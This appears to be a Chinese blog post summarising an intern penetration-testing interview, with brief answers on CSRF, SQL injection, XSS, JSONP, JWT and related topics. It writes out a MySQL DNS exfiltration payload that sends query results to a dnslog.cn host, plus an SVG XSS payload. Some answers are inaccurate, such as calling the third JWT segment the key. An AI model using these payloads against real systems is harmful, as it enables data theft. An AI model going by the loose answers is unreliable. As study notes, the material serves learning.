渗透测试实习生面试总结
水了好长一段时间了,是时候静下心来好好学习了。前段时间经历了人生中第一次面试,做做总结,查漏补缺。
面试问题
top 10
-
CSRF 修复方式
- get 类型
填加 token 或者验证码,因为单纯验证 referer 极易被绕过(如将链接留在评论留言处) - post 类型
验证 referer 可有效防止(注意 referer 为空的特殊情况)。构造表单无法伪造 referer,只能简单将其置为空(meta 标签)
- get 类型
-
SSRF 利用方式及修复方法
-
SQL注入
- SQL 语句
增删改查基本语句使用。 - 基本分类
数字型,字符型,搜索型;union 注入,堆叠注入,报错注入,(布尔、时间)盲注 - 判断数据库类型
mysql 有特殊表;不同的数据库函数库不同;盲注的话可通过数据库名称的长度判断是什么数据库 - 宽字节注入原理
%df
造成字符吞噬 - dns 外带数据
利用 mysql (Windows 适用)中的load_file()
函数,select load_file(concat("\\\\",version(),".1ndex.dnslog.cn//1ndex.txt"));
当查询的数据中有特殊符号时,可使用 hex() 函数外带,select load_file(concat("\\\\",hex(version()),".1ndex.dnslog.cn//1ndex.txt"));
,数据过长不行
- SQL 语句
-
反序列化
-
XSS
- 过滤
httponly;针对一般输入点:实体编码,特征字符过滤;富文本:事件过滤,特殊函数过滤 - svg 图片 XSS
<svg><script>alert(1)</script></svg>
- 跨域
可跨域的标签:script,link,img (frame 可以吗?)
跨域的方法:jsonp,ajax
- 过滤
逻辑漏洞
- 普通价格漏洞成因及修复方法
- 成因
后端未校验订单金额与实际到账金额是否匹配 - 修复
- 成因
- 越权
内网
- linux 提权
- 其他没学
app
-
怎样判断 app 是二次打包的
当时不知道问的到底是加了壳还是被植入恶意代码后打包- 加壳
传送门 - 植入恶意代码
校验 MD5
- 加壳
-
组件安全
四大组件可能存在的漏洞
tcp
- 三次握手
- 全连接半连接扫描
传送门,全连接(SYN+SYN/ACK),半连接(SYN),全连接扫描准确性高,半连接扫描隐蔽性高
其他
-
有没有关注最近新出的漏洞
-
学校经历
另一个师傅问的问题
-
jsonp 劫持
- 危害
- 防御
跟防御 CSRF 一样
-
密码学
- CBC
-
CORS
-
JWT 三段分别代表什么
加密算法、数据、密钥 -
编程题
-
RCE